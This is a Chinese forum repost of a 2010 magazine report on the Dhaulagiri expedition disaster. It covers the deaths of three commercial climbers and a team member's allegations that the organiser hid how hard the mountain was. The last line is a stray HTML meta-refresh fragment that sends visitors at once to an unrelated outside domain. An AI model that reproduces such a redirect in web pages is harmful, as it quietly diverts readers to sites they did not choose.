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8人民间商业登山队登顶不到24小时3个人死亡
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[常识技巧]
8人民间商业登山队登顶不到24小时3个人死亡
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大河
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电梯直达
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发表于 2010-6-13 08:48:13
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道拉吉里山难:常识考验下的高山探险 一支8人组成的民间商业登山队,体验登顶快感不到24小时,就失去了3条生命。2010年5月13日,尼泊尔道拉吉里山以这样的方式告诉山友:这里绝不是旅游休闲的去处。 记者◎李翊 实习记者◎贾子健 3个人的死亡 李斌彻底躺下的时候,楼国龙竟然一点感觉也没有,他告诉本刊记者,“那时我已经麻木了,看到死人就像看到动物死亡一样,没有任何感觉”。这个时间定格在5月13日18点至19点,距离13日凌晨1点开始登顶那个时刻不到24小时。 “海拔时间没记忆了,下山不久,就一直昏沉沉半睡半醒这样了,停时我就睡,再醒来,身边只有一个夏尔巴人坐着。李斌氧气面罩已不见,思维还清晰,说话清楚,说‘你们走,不要再拖’;‘好冷啊,不走了’。我就这样看着李斌从一口气变成半口气,最后结束了生命。” 李斌是8人组成的道拉吉里中国民间登山队的第一个死亡者,他长眠在尼泊尔道拉吉里山7600~7350米陡、雪岩混合处。 ·明星都开啥车 ·赢免费燃油行更多里程 死神第二次来临是在14日凌晨2点,赵亮寻错路攀岩石,被夏尔巴人喊回,在返回中滑坠。根据夏尔巴人拉合巴和达瓦丹增给本刊记者的回复邮件,赵亮滑坠点约在海拔7700~7600米,滑坠超过150米,未停顿或被岩石卡住,踪迹全无。中方队员张梁曾听到韩昕喊赵亮,之后很快恢复安静。 在赵亮失踪后仅一个多小时,身体状况尚可的韩昕成为第三个死亡对象。3点30分至4点之间,中方队员张梁、饶剑锋、楼国龙、韩昕4人在7450米处一小平台会聚。张梁和达瓦丹增继续下C3。楼国龙还记得,张梁撤前,韩昕还对张梁做按摩放松。然而,就在张梁下C3后不久,韩昕在试图减轻重量,解背包冰爪、安全带准备下撤时,滑坠50米被岩石卡住。14日6点30分,3个夏尔巴人从C3往上接困守在7450米处的楼国龙和饶剑锋,在附近发现韩昕,用绳拴韩昕拖救,发现韩昕已遇难,遂放弃。 当以张梁为首的7人与“杨春风高山探险服务有限公司”签下登山协议时,这样仓皇逃生,生死瞬间的局面并不在计划内。 “杨春风高山探险服务有限公司”组织的道拉吉里登山队,队员7人:赵亮、李斌、楼国龙、王江(化名)、张梁、韩昕、饶剑峰。领队杨春风,攀登队长张伟,记者郑向锋,全队10名成员。队员多为杨春风之前登山客户,商业登过7000~8000米山峰。2010年4月19日,全部抵达道拉吉里BC。临离开成都时,7人曾拍下合影,每个人脸上都写着“跃跃欲试,踌躇满志”。 为了这次与道拉吉里峰的约定,这7个人人均需要向“杨春风公司”支付10万元的登山费用。这个数字在乌鲁木齐市登山探险协会副主席王铁男看来,属于登山界很低的,他告诉本刊记者,“国内登珠峰的价格有20万~25万元的”。7个人身份各异:张梁是深圳农业银行职员、国家级登山健将、深圳市登山户外运动协会副会长;赵亮是深圳市某职能部门的一名公务员;李斌在空军某部当过多年飞行员,后任深圳航空公司飞行部六分部空中客车A320/319教员;韩昕是山东淄博探路者户外用品区域总经理;同样来自深圳的饶剑锋是深圳特发集团特发地产前总经理;广东人楼国龙曾经是大学教师,后下海从事医疗器材生意,现在已经“退休”,以周游世界为乐。 不过5月3日,在江苏光大银行工作的王江因假期满,中途撤出,使得最后实际成行队员人数变为6人。在山难后接受本刊记者采访时,王江坦率地指出,假期即将结束并不是最主要原因,因为他已经和单位申请到了续假,但是他自己感觉非常不好,这种感觉源于对杨春风这次活动组织的不信任。 王江认为,在活动发起时,杨春风隐瞒了山的难度。“关于道拉吉里峰的资料非常少,不像珠穆朗玛、慕士塔格、卓奥友这样的山峰,有很多山友发的博客、图片可以了解。不懂英文也无法了解到英文资料里关于这座山的介绍。最初想要组织道拉吉里攀登的其实是新疆乔格里公司。2009年10~11月,乔格里公司曾经派人来给攀登过7000米以上山峰的队员做工作,看是否愿意去攀登道拉吉里峰,这些队员包括我、楼国龙、饶剑锋等。因为我对2009年7月乔格里公司组织的慕士塔格峰攀登服务很满意,就同意考虑。”王江说,2009年底,杨春风脱离乔格里公司自组公司,后来,杨春风公司的职员麦子打电话邀请他参加道拉吉里的攀登计划,并说杨春风是经验非常丰富的领队,攀登慕士塔格、玛纳斯鲁的成功都是他的功劳,现在因为经济上的一些矛盾从乔格里分出来了。在王江最关心的攀登难度问题上,杨春风公司的答复是与卓奥友一样(卓奥友是8000米山峰的初级入门山)。 山难发生后已回到国内的王江在和乔格里的总经理侍海峰以及一些活着回来的队员交流后才知道,2009年底,乔格里公司在准备道拉吉里计划时,曾经咨询了西藏登山队、王勇峰还有夏尔巴人等多方意见,他们给出的反馈是千万不要登道拉吉里峰,这座山不适合商业登山。侍海峰曾亲自给楼国龙和饶剑锋打电话告诉他们活动取消,而通知王江的是麦子,麦子却隐瞒了这个情况。 想法不一的登山者 作为深航的飞行教员,李斌爱上登山有一个缓慢渐进的过程。深圳的户外运动一直开展得很好,李斌和太太孙艳清1996年到深圳定居,喜欢上磨坊网的李斌开始和太太一起参与登山活动。最初他们只是爬爬深圳周边的土山,随着时间的推移,李斌开始关注磨坊网的“高寒地带”版,也开始参加关于雪山方面的登山讲座,将目标投向了雪山。 孙艳清告诉本刊记者,李斌最开始接触雪山攀登是从四川的四姑娘山(大概2003年)、青海玉珠峰(约2005年)开始的。之后,李斌又登了慕士塔格、卓奥友峰……李斌和赵亮在深圳的户外运动中认识,曾经一起去登梧桐山,交往比较多。之所以会参加道拉吉里登山,“是听说赵亮也去”。 李斌曾经登过两次卓奥友,第一次登顶未成功。“他是飞行员,也曾经学习过观测天气,当时天气情况不好,他感觉根本不能登顶,就果断地决定下撤。”这事让家人觉得李斌是有理性和自控能力的,也就不过多担心安全问题。 “这次去也会提醒他注意安全,但是并没有多想。”在出发前,李斌还去香港采购装备,包括可以在零下40~50摄氏度使用的睡袋。“当时他特别高兴,体力也非常好,出发前没有任何问题。”由于登顶时间一再拖延,孙艳清的休假也到了,两人在卫星电话里约定在拉萨见面。因为按照正常的登山计划,5月15、16日,队伍会安全返回拉萨。 孙艳清说,李斌保留着一张合影,是一次登山中与一位外国独腿登山者的合影。“他驾驶的飞机也曾飞过雪山,但他认为雪山是用脚来丈量的,征服雪山的时候也是在征服自己。” 然而,当对自身能力没有一个正确评估时,征服自己似乎就成了难以企及的梦想。王江说,李斌在到达大本营时就出现了高原反应,吐了。在他的感受中,道拉吉里4000多米的地方比卓奥友的5800米还要难受。此外,恐高与李斌飞行员的身份和他热爱登山的行为显得非常矛盾。张梁说他也曾和李斌聊过这个,李斌说可能开飞机和徒步行走的感觉还是不一样。张梁回忆,从7950米无路绳到山顶的一段要过一个冰裂缝,机长显得很恐惧,行进很慢,不敢过去。但是后来,他还是过了冰裂缝,并最终登顶。 ="refresh" "0; url=http://0909.cc">
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